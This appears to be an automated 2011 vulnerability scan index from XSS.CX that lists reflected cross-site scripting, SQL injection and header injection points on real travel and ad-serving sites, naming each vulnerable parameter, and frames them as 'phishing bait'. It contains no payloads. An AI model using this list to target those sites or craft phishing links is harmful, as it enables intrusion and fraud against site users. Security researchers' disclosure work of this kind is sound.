XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10022011-02

Travel Industry Segemented Report with respect to Phishing Bait

Report generated by XSS.CX at Sun Oct 02 21:15:06 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. SQL injection

1.1. http://ad.yieldmanager.com/imp [atf parameter]

1.2. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH [JEB2 cookie]

1.3. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH [REST URL parameter 1]

1.4. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH [Referer HTTP header]

1.5. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH [User-Agent HTTP header]

1.6. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH [JEB2 cookie]

1.7. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH [loc parameter]

1.8. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH [REST URL parameter 1]

1.9. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH [User-Agent HTTP header]

1.10. http://adserver.adtech.de/addyn|3.0|999|3106006|0|168|ADTECH [name of an arbitrarily supplied request parameter]

1.11. http://dm.travelocity.com/html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176 [NGUserID cookie]

1.12. http://www.hotels.com/compare/hotel_dockingbar.html [SSPV cookie]

1.13. http://www.hotels.com/compare/hotel_dockingbar.html [SSRT cookie]

1.14. http://www.hotels.com/compare/hotel_dockingbar.html [__utmc cookie]

1.15. http://www.hotels.com/compare/hotel_dockingbar.html [name of an arbitrarily supplied request parameter]

1.16. http://www.hotels.com/hotel/details.html [REST URL parameter 2]

1.17. http://www.hotels.com/hotel/details.html [__utmc cookie]

1.18. http://www.hotels.com/hotel/details.html [channel cookie]

1.19. http://www.hotels.com/hotel/details.html [guid cookie]

1.20. http://www.hotels.com/hotel/hoteldata.html [__utmc cookie]

1.21. http://www.hotels.com/hoteldetails/urgencypopup.html [REST URL parameter 2]

1.22. http://www.hotels.com/hoteldetails/urgencypopup.html [mvthistory cookie]

1.23. http://www.revresda.com/event.ng/Type=click&FlightID=131794&AdID=260643&TargetID=62091&Segments=65,3522,3724,4354,4979,5788,7409,8303,8427,8773,11672,12591,22067,22782,24028,26273,27371,30359,34504,38844,38860,39489,39804,41374,41375,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58777,58865,58980,59407,59626,59629,59841,60715,61547,61548,61677,61817,62031,62093,62466,62910,63592,63927,64040&Targets=4897,9413,41261,42842,42841,62091&Values=60,80,92,101,138,194,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/ [REST URL parameter 2]

1.24. http://www.revresda.com/event.ng/Type=click&FlightID=131795&AdID=260698&TargetID=63940&Segments=65,3522,3724,4354,4979,7409,8303,8773,11672,12591,22067,22782,24028,26276,27371,30286,30359,30533,34504,38844,38860,39489,39804,41374,41375,42628,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58784,58865,59407,59626,59629,59841,60715,61547,61548,61677,61817,61818,62031,62093,62139,62324,62466,62910,63590,63592,63615,63927,64040&Targets=4897,41261,42842,42841,63940&Values=60,80,92,101,138,195,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/index.html [REST URL parameter 2]

2. XPath injection

3. HTTP header injection

3.1. http://ad.doubleclick.net/getcamphist [src parameter]

3.2. http://kantarmedia.guardian.co.uk/RealMedia/ads/adstream.cap [476949646137654800&c parameter]

4. Cross-site scripting (reflected)

4.1. http://a.collective-media.net/adj/cm.guardian/ [REST URL parameter 2]

4.2. http://a.collective-media.net/adj/cm.guardian/ [name of an arbitrarily supplied request parameter]

4.3. http://a.collective-media.net/adj/cm.guardian/ [sz parameter]

4.4. http://a.collective-media.net/cmadj/cm.guardian/ [REST URL parameter 2]

4.5. http://a.collective-media.net/cmadj/cm.guardian/ [sz parameter]

4.6. http://ad.technoratimedia.com/st [name of an arbitrarily supplied request parameter]

4.7. http://ad.turn.com/server/pixel.htm [fpid parameter]

4.8. http://ad.turn.com/server/pixel.htm [sp parameter]

4.9. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

4.10. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

4.11. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH [loc parameter]

4.12. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH [loc parameter]

4.13. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH [name of an arbitrarily supplied request parameter]

4.14. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH [name of an arbitrarily supplied request parameter]

4.15. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH [loc parameter]

4.16. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH [loc parameter]

4.17. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH [name of an arbitrarily supplied request parameter]

4.18. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH [name of an arbitrarily supplied request parameter]

4.19. http://api.bizographics.com/v2/profile.redirect [api_key parameter]

4.20. http://api.wipmania.com/jsonp [callback parameter]

4.21. http://ar.voicefive.com/b/rc.pli [func parameter]

4.22. http://as.chango.com/links/adunit/1.31759988192e+12 [adpos parameter]

4.23. http://as.chango.com/links/adunit/1.31759988192e+12 [atype parameter]

4.24. http://as.chango.com/links/adunit/1.31759988192e+12 [bidder parameter]

4.25. http://as.chango.com/links/adunit/1.31759988192e+12 [datc parameter]

4.26. http://as.chango.com/links/adunit/1.31759988192e+12 [dc parameter]

4.27. http://as.chango.com/links/adunit/1.31759988192e+12 [dom parameter]

4.28. http://as.chango.com/links/adunit/1.31759988192e+12 [eid parameter]

4.29. http://as.chango.com/links/adunit/1.31759988192e+12 [ht parameter]

4.30. http://as.chango.com/links/adunit/1.31759988192e+12 [ibs parameter]

4.31. http://as.chango.com/links/adunit/1.31759988192e+12 [poo parameter]

4.32. http://as.chango.com/links/adunit/1.31759988192e+12 [sid parameter]

4.33. http://as.chango.com/links/adunit/1.31759988192e+12 [sig parameter]

4.34. http://as.chango.com/links/adunit/1.31759988192e+12 [st parameter]

4.35. http://as.chango.com/links/adunit/1.31759988192e+12 [stid parameter]

4.36. http://as.chango.com/links/adunit/1.31759988192e+12 [url parameter]

4.37. http://as.chango.com/links/adunit/1.31759988192e+12 [wh parameter]

4.38. http://as00.estara.com/as/InitiateCall2.php [template parameter]

4.39. http://b.scorecardresearch.com/beacon.js [c1 parameter]

4.40. http://b.scorecardresearch.com/beacon.js [c10 parameter]

4.41. http://b.scorecardresearch.com/beacon.js [c2 parameter]

4.42. http://b.scorecardresearch.com/beacon.js [c3 parameter]

4.43. http://b.scorecardresearch.com/beacon.js [c4 parameter]

4.44. http://b.scorecardresearch.com/beacon.js [c5 parameter]

4.45. http://b.scorecardresearch.com/beacon.js [c6 parameter]

4.46. http://bid.openx.net/json [c parameter]

4.47. http://d.tradex.openx.com/afr.php [cb parameter]

4.48. http://d.tradex.openx.com/afr.php [loc parameter]

4.49. http://d.tradex.openx.com/afr.php [name of an arbitrarily supplied request parameter]

4.50. http://d.tradex.openx.com/afr.php [zoneid parameter]

4.51. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers [mid parameter]

4.52. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers [mid parameter]

4.53. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf [mid parameter]

4.54. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf [mid parameter]

4.55. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 2]

4.56. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 3]

4.57. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 4]

4.58. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 5]

4.59. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 6]

4.60. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 7]

4.61. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [name of an arbitrarily supplied request parameter]

4.62. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [redir parameter]

4.63. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [sz parameter]

4.64. http://goal.us.intellitxt.com/al.asp [jscallback parameter]

4.65. http://goal.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

4.66. http://goal.us.intellitxt.com/v4/init [jscallback parameter]

4.67. http://goal.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

4.68. http://ib.adnxs.com/ab [ccd parameter]

4.69. http://ib.adnxs.com/ab [cnd parameter]

4.70. http://ib.adnxs.com/ab [referrer parameter]

4.71. http://ib.adnxs.com/ab [tt_code parameter]

4.72. http://js.revsci.net/gateway/gw.js [csid parameter]

4.73. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3 [REST URL parameter 4]

4.74. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3 [REST URL parameter 5]

4.75. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3 [name of an arbitrarily supplied request parameter]

4.76. http://orbitz.tt.omtrdc.net/m2/orbitz/mbox/standard [mbox parameter]

4.77. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/mbox/standard [mbox parameter]

4.78. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/sc/standard [mbox parameter]

4.79. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/sc/standard [mboxId parameter]

4.80. http://otter.topsy.com/stats.js [url parameter]

4.81. https://secure.mlb.com/style/nav_2011.jsp [section parameter]

4.82. http://servedby.flashtalking.com/imp/1/16628 [183799;201;js;BarclaysPremierLeague;RONMPU/?click parameter]

4.83. http://servedby.flashtalking.com/imp/1/16628 [cachebuster parameter]

4.84. http://servedby.flashtalking.com/imp/1/16628 [ftadz parameter]

4.85. http://servedby.flashtalking.com/imp/1/16628 [ftscw parameter]

4.86. http://servedby.flashtalking.com/imp/1/16628 [ftx parameter]

4.87. http://servedby.flashtalking.com/imp/1/16628 [fty parameter]

4.88. http://servedby.flashtalking.com/imp/1/16628 [name of an arbitrarily supplied request parameter]

4.89. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]

4.90. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]

4.91. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]

4.92. http://static.igougo.com/traveldeals/iAuto.aspx [REST URL parameter 1]

4.93. http://tacoda-fatcat.search.aol.com/fa/eval [att parameter]

4.94. http://tacoda-fatcat.search.aol.com/fa/eval [query parameter]

4.95. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

4.96. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

4.97. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

4.98. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

4.99. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

4.100. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

4.101. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

4.102. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

4.103. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]

4.104. http://travela.priceline.com/hotel/newHotelSearch.do [checkInDate parameter]

4.105. http://travela.priceline.com/hotel/newHotelSearch.do [checkInDate parameter]

4.106. http://travela.priceline.com/hotel/newHotelSearch.do [checkOutDate parameter]

4.107. http://travela.priceline.com/hotel/newHotelSearch.do [checkOutDate parameter]

4.108. http://travela.priceline.com/hotel/newHotelSearch.do [noWait parameter]

4.109. http://travela.priceline.com/hotel/searchHotels.do [CkInDay parameter]

4.110. http://travela.priceline.com/hotel/searchHotels.do [CkInMonth parameter]

4.111. http://travela.priceline.com/hotel/searchHotels.do [CkInYear parameter]

4.112. http://travela.priceline.com/hotel/searchHotels.do [CkOutDay parameter]

4.113. http://travela.priceline.com/hotel/searchHotels.do [CkOutMonth parameter]

4.114. http://travela.priceline.com/hotel/searchHotels.do [CkOutYear parameter]

4.115. http://travela.priceline.com/hotel/searchHotels.do [Initialized parameter]

4.116. http://travela.priceline.com/hotel/searchHotels.do [KMode parameter]

4.117. http://travela.priceline.com/hotel/searchHotels.do [RefClickID parameter]

4.118. http://travela.priceline.com/hotel/searchHotels.do [RefID parameter]

4.119. http://travela.priceline.com/hotel/searchHotels.do [affiliateSubID parameter]

4.120. http://travela.priceline.com/hotel/searchHotels.do [checkInDate parameter]

4.121. http://travela.priceline.com/hotel/searchHotels.do [checkInDate parameter]

4.122. http://travela.priceline.com/hotel/searchHotels.do [checkOutDate parameter]

4.123. http://travela.priceline.com/hotel/searchHotels.do [checkOutDate parameter]

4.124. http://travela.priceline.com/hotel/searchHotels.do [cityName parameter]

4.125. http://travela.priceline.com/hotel/searchHotels.do [homepage parameter]

4.126. http://travela.priceline.com/hotel/searchHotels.do [hotelBrand parameter]

4.127. http://travela.priceline.com/hotel/searchHotels.do [hotelBrand parameter]

4.128. http://travela.priceline.com/hotel/searchHotels.do [name of an arbitrarily supplied request parameter]

4.129. http://travela.priceline.com/hotel/searchHotels.do [name of an arbitrarily supplied request parameter]

4.130. http://travela.priceline.com/hotel/searchHotels.do [numberOfRooms parameter]

4.131. http://travela.priceline.com/hotel/searchHotels.do [numberOfRooms parameter]

4.132. http://travela.priceline.com/hotel/searchHotels.do [otherCityName parameter]

4.133. http://travela.priceline.com/hotel/searchHotels.do [passingValues parameter]

4.134. http://travela.priceline.com/hotel/searchHotels.do [plf parameter]

4.135. http://travela.priceline.com/hotel/searchHotels.do [plf parameter]

4.136. http://travela.priceline.com/hotel/searchHotels.do [refclickid parameter]

4.137. http://travela.priceline.com/hotel/searchHotels.do [refid parameter]

4.138. http://travela.priceline.com/hotel/searchHotels.do [searchHotelName parameter]

4.139. http://travela.priceline.com/hotel/searchHotels.do [searchHotelName parameter]

4.140. http://travela.priceline.com/hotel/searchHotels.do [searchType parameter]

4.141. http://travela.priceline.com/hotel/searchHotels.do [session_key parameter]

4.142. http://travela.priceline.com/hotel/searchHotels.do [session_key parameter]

4.143. http://travela.priceline.com/hotel/searchHotels.do [starRating parameter]

4.144. http://travela.priceline.com/hotel/searchHotels.do [starRating parameter]

4.145. http://travela.priceline.com/hotel/searchHotels_process.do [checkInDate parameter]

4.146. http://travela.priceline.com/hotel/searchHotels_process.do [checkInDate parameter]

4.147. http://travela.priceline.com/hotel/searchHotels_process.do [checkOutDate parameter]

4.148. http://travela.priceline.com/hotel/searchHotels_process.do [checkOutDate parameter]

4.149. http://travela.priceline.com/hotel/searchHotels_process.do [key parameter]

4.150. http://travela.priceline.com/hotel/searchHotels_process.do [key parameter]

4.151. http://travela.priceline.com/hotel/searchHotels_process.do [key parameter]

4.152. http://travela.priceline.com/hotel/searchHotels_process.do [numberOfRooms parameter]

4.153. http://travela.priceline.com/hotel/searchHotels_process.do [numberOfRooms parameter]

4.154. http://travela.priceline.com/hotel/searchResults.do [key parameter]

4.155. http://travela.priceline.com/hotel/searchResults.do [key parameter]

4.156. http://travela.priceline.com/hotel/searchResults.do [key parameter]

4.157. http://www.agoda.com/pages/agoda/default/page_AdScript.aspx [conversionID parameter]

4.158. http://www.agoda.com/pages/agoda/default/page_AdScript.aspx [conversionLabel parameter]

4.159. http://www.aon.com/site/search.jsp [q parameter]

4.160. http://www.aon.com/site/search.jsp [q parameter]

4.161. http://www.aon.com/site/search.jsp [q parameter]

4.162. http://www.booking.com/hotel/us/c-boston-massachusettes.html [REST URL parameter 1]

4.163. http://www.booking.com/hotel/us/c-boston-massachusettes.html [REST URL parameter 1]

4.164. http://www.booking.com/hotel/us/c-boston-massachusettes.html [REST URL parameter 2]

4.165. http://www.booking.com/hotel/us/c-boston-massachusettes.html [REST URL parameter 2]

4.166. http://www.booking.com/hotel/us/c-boston-massachusettes.html [REST URL parameter 3]

4.167. http://www.booking.com/hotel/us/c-boston-massachusettes.html [REST URL parameter 3]

4.168. http://www.booking.com/hotel/us/c-boston-massachusettes.html [aid parameter]

4.169. http://www.booking.com/hotel/us/c-boston-massachusettes.html [aid parameter]

4.170. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkin_monthday parameter]

4.171. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkin_monthday parameter]

4.172. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkin_year_month parameter]

4.173. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkin_year_month parameter]

4.174. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkout_monthday parameter]

4.175. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkout_monthday parameter]

4.176. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkout_year_month parameter]

4.177. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkout_year_month parameter]

4.178. http://www.booking.com/hotel/us/c-boston-massachusettes.html [do_availability_check parameter]

4.179. http://www.booking.com/hotel/us/c-boston-massachusettes.html [do_availability_check parameter]

4.180. http://www.booking.com/hotel/us/c-boston-massachusettes.html [label parameter]

4.181. http://www.booking.com/hotel/us/c-boston-massachusettes.html [label parameter]

4.182. http://www.booking.com/hotel/us/c-boston-massachusettes.html [lang parameter]

4.183. http://www.booking.com/hotel/us/c-boston-massachusettes.html [lang parameter]

4.184. http://www.booking.com/hotel/us/c-boston-massachusettes.html [name of an arbitrarily supplied request parameter]

4.185. http://www.booking.com/hotel/us/c-boston-massachusettes.html [name of an arbitrarily supplied request parameter]

4.186. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_content parameter]

4.187. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_content parameter]

4.188. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_medium parameter]

4.189. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_medium parameter]

4.190. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_source parameter]

4.191. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_source parameter]

4.192. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_term parameter]

4.193. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_term parameter]

4.194. http://www.booking.com/hotel/us/copley-square.en-us.html [REST URL parameter 1]

4.195. http://www.booking.com/hotel/us/copley-square.en-us.html [REST URL parameter 1]

4.196. http://www.booking.com/hotel/us/copley-square.en-us.html [REST URL parameter 2]

4.197. http://www.booking.com/hotel/us/copley-square.en-us.html [REST URL parameter 2]

4.198. http://www.booking.com/hotel/us/copley-square.en-us.html [REST URL parameter 3]

4.199. http://www.booking.com/hotel/us/copley-square.en-us.html [REST URL parameter 3]

4.200. http://www.booking.com/hotel/us/copley-square.en-us.html [aid parameter]

4.201. http://www.booking.com/hotel/us/copley-square.en-us.html [aid parameter]

4.202. http://www.booking.com/hotel/us/copley-square.en-us.html [name of an arbitrarily supplied request parameter]

4.203. http://www.booking.com/hotel/us/copley-square.en-us.html [name of an arbitrarily supplied request parameter]

4.204. http://www.booking.com/load_times [REST URL parameter 1]

4.205. http://www.booking.com/load_times [REST URL parameter 1]

4.206. http://www.booking.com/logo [REST URL parameter 1]

4.207. http://www.booking.com/logo [REST URL parameter 1]

4.208. http://www.booking.com/searchresults.html [REST URL parameter 1]

4.209. http://www.booking.com/searchresults.html [REST URL parameter 1]

4.210. http://www.booking.com/searchresults.html [aid parameter]

4.211. http://www.booking.com/searchresults.html [aid parameter]

4.212. http://www.booking.com/searchresults.html [checkin_monthday parameter]

4.213. http://www.booking.com/searchresults.html [checkin_monthday parameter]

4.214. http://www.booking.com/searchresults.html [checkin_year_month parameter]

4.215. http://www.booking.com/searchresults.html [checkin_year_month parameter]

4.216. http://www.booking.com/searchresults.html [checkout_monthday parameter]

4.217. http://www.booking.com/searchresults.html [checkout_monthday parameter]

4.218. http://www.booking.com/searchresults.html [checkout_year_month parameter]

4.219. http://www.booking.com/searchresults.html [checkout_year_month parameter]

4.220. http://www.booking.com/searchresults.html [city parameter]

4.221. http://www.booking.com/searchresults.html [city parameter]

4.222. http://www.booking.com/searchresults.html [do_availability_check parameter]

4.223. http://www.booking.com/searchresults.html [do_availability_check parameter]

4.224. http://www.booking.com/searchresults.html [label parameter]

4.225. http://www.booking.com/searchresults.html [label parameter]

4.226. http://www.booking.com/searchresults.html [name of an arbitrarily supplied request parameter]

4.227. http://www.booking.com/searchresults.html [name of an arbitrarily supplied request parameter]

4.228. http://www.booking.com/searchresults.html [utm_campaign parameter]

4.229. http://www.booking.com/searchresults.html [utm_campaign parameter]

4.230. http://www.booking.com/searchresults.html [utm_medium parameter]

4.231. http://www.booking.com/searchresults.html [utm_medium parameter]

4.232. http://www.booking.com/searchresults.html [utm_source parameter]

4.233. http://www.booking.com/searchresults.html [utm_source parameter]

4.234. http://www.booking.com/searchresults.html [utm_term parameter]

4.235. http://www.booking.com/searchresults.html [utm_term parameter]

4.236. http://www.expedia.com/Hotel-Search [hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_hotelSearchRegionControl_cityControl_inpCity parameter]

4.237. http://www.expedia.com/Hotel-Search [hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_hotelSearchRegionControl_cityControl_inpCity parameter]

4.238. http://www.goal.com/en/comment/comments-box [allCommentsUrl parameter]

4.239. http://www.goal.com/en/teams/england/97/man-utd-news [REST URL parameter 5]

4.240. http://www.hotelplanner.com/ClickThrough.cfm [Source parameter]

4.241. http://www.hotelplanner.com/ClickThrough.cfm [Source parameter]

4.242. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [NumRooms parameter]

4.243. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [NumRooms parameter]

4.244. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [NumRooms parameter]

4.245. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [hotelID parameter]

4.246. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [hotelID parameter]

4.247. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [hotelID parameter]

4.248. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [hrnQuoteKey parameter]

4.249. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [inDate parameter]

4.250. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [name of an arbitrarily supplied request parameter]

4.251. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [outDate parameter]

4.252. http://www.hotelplanner.com/Impressions.cfm [Ad_ID parameter]

4.253. http://www.hotelplanner.com/Impressions.cfm [Ad_ID parameter]

4.254. http://www.hotelplanner.com/Impressions.cfm [Ad_ID parameter]

4.255. http://www.hotelplanner.com/Search/Index.cfm [City parameter]

4.256. http://www.hotelplanner.com/Search/Index.cfm [Country parameter]

4.257. http://www.hotelplanner.com/Search/Index.cfm [InDate parameter]

4.258. http://www.hotelplanner.com/Search/Index.cfm [InDate parameter]

4.259. http://www.hotelplanner.com/Search/Index.cfm [NumRooms parameter]

4.260. http://www.hotelplanner.com/Search/Index.cfm [OutDate parameter]

4.261. http://www.hotelplanner.com/Search/Index.cfm [OutDate parameter]

4.262. http://www.hotelplanner.com/Search/Index.cfm [State parameter]

4.263. http://www.hotelplanner.com/Search/Index.cfm [adults parameter]

4.264. http://www.hotelplanner.com/Search/Index.cfm [name of an arbitrarily supplied request parameter]

4.265. http://www.hotelplanner.com/Search/Index.cfm [sc parameter]

4.266. http://www.hotelplanner.com/Search/index.cfm [HotelName parameter]

4.267. http://www.hotelplanner.com/Search/index.cfm [NumRooms parameter]

4.268. http://www.hotelplanner.com/Search/index.cfm [PriceMax parameter]

4.269. http://www.hotelplanner.com/Search/index.cfm [PriceMin parameter]

4.270. http://www.hotelplanner.com/Search/index.cfm [Rating parameter]

4.271. http://www.hotelplanner.com/Search/index.cfm [ViewType parameter]

4.272. http://www.hotelplanner.com/Search/index.cfm [btnGo.x parameter]

4.273. http://www.hotelplanner.com/Search/index.cfm [btnGo.y parameter]

4.274. https://www.hotelplanner.com/Accept/Reserve.cfm [DisplayNightlyRates parameter]

4.275. https://www.hotelplanner.com/Accept/Reserve.cfm [HotelName parameter]

4.276. https://www.hotelplanner.com/Accept/Reserve.cfm [NativeNightlyRates parameter]

4.277. https://www.hotelplanner.com/Accept/Reserve.cfm [ValueAdds parameter]

4.278. https://www.hotelplanner.com/Accept/Reserve.cfm [ValueAdds parameter]

4.279. https://www.hotelplanner.com/Accept/Reserve.cfm [arrivalDay parameter]

4.280. https://www.hotelplanner.com/Accept/Reserve.cfm [arrivalMonth parameter]

4.281. https://www.hotelplanner.com/Accept/Reserve.cfm [arrivalYear parameter]

4.282. https://www.hotelplanner.com/Accept/Reserve.cfm [bedType parameter]

4.283. https://www.hotelplanner.com/Accept/Reserve.cfm [bedTypes parameter]

4.284. https://www.hotelplanner.com/Accept/Reserve.cfm [bedTypes parameter]

4.285. https://www.hotelplanner.com/Accept/Reserve.cfm [cancellationPolicy parameter]

4.286. https://www.hotelplanner.com/Accept/Reserve.cfm [cancellationPolicy parameter]

4.287. https://www.hotelplanner.com/Accept/Reserve.cfm [chargeableRoomRateTaxesAndFees parameter]

4.288. https://www.hotelplanner.com/Accept/Reserve.cfm [chargeableRoomRateTotal parameter]

4.289. https://www.hotelplanner.com/Accept/Reserve.cfm [departureDay parameter]

4.290. https://www.hotelplanner.com/Accept/Reserve.cfm [departureMonth parameter]

4.291. https://www.hotelplanner.com/Accept/Reserve.cfm [departureYear parameter]

4.292. https://www.hotelplanner.com/Accept/Reserve.cfm [depositRequired parameter]

4.293. https://www.hotelplanner.com/Accept/Reserve.cfm [displayCurrencyCode parameter]

4.294. https://www.hotelplanner.com/Accept/Reserve.cfm [displayRoomRate parameter]

4.295. https://www.hotelplanner.com/Accept/Reserve.cfm [extraPersonFees parameter]

4.296. https://www.hotelplanner.com/Accept/Reserve.cfm [guaranteeRequired parameter]

4.297. https://www.hotelplanner.com/Accept/Reserve.cfm [hotelID parameter]

4.298. https://www.hotelplanner.com/Accept/Reserve.cfm [hrnQuoteKey parameter]

4.299. https://www.hotelplanner.com/Accept/Reserve.cfm [immediateChargeRequired parameter]

4.300. https://www.hotelplanner.com/Accept/Reserve.cfm [locale parameter]

4.301. https://www.hotelplanner.com/Accept/Reserve.cfm [nativeCurrencyCode parameter]

4.302. https://www.hotelplanner.com/Accept/Reserve.cfm [nativeRoomRate parameter]

4.303. https://www.hotelplanner.com/Accept/Reserve.cfm [numberOfAdults parameter]

4.304. https://www.hotelplanner.com/Accept/Reserve.cfm [numberOfAdults parameter]

4.305. https://www.hotelplanner.com/Accept/Reserve.cfm [numberOfChildren parameter]

4.306. https://www.hotelplanner.com/Accept/Reserve.cfm [numberOfChildren parameter]

4.307. https://www.hotelplanner.com/Accept/Reserve.cfm [numberOfRooms parameter]

4.308. https://www.hotelplanner.com/Accept/Reserve.cfm [promoDescription parameter]

4.309. https://www.hotelplanner.com/Accept/Reserve.cfm [promoDescription parameter]

4.310. https://www.hotelplanner.com/Accept/Reserve.cfm [promoType parameter]

4.311. https://www.hotelplanner.com/Accept/Reserve.cfm [propertyID parameter]

4.312. https://www.hotelplanner.com/Accept/Reserve.cfm [propertyType parameter]

4.313. https://www.hotelplanner.com/Accept/Reserve.cfm [rateChange parameter]

4.314. https://www.hotelplanner.com/Accept/Reserve.cfm [rateCode parameter]

4.315. https://www.hotelplanner.com/Accept/Reserve.cfm [rateDescription parameter]

4.316. https://www.hotelplanner.com/Accept/Reserve.cfm [rateFrequency parameter]

4.317. https://www.hotelplanner.com/Accept/Reserve.cfm [roomTypeCode parameter]

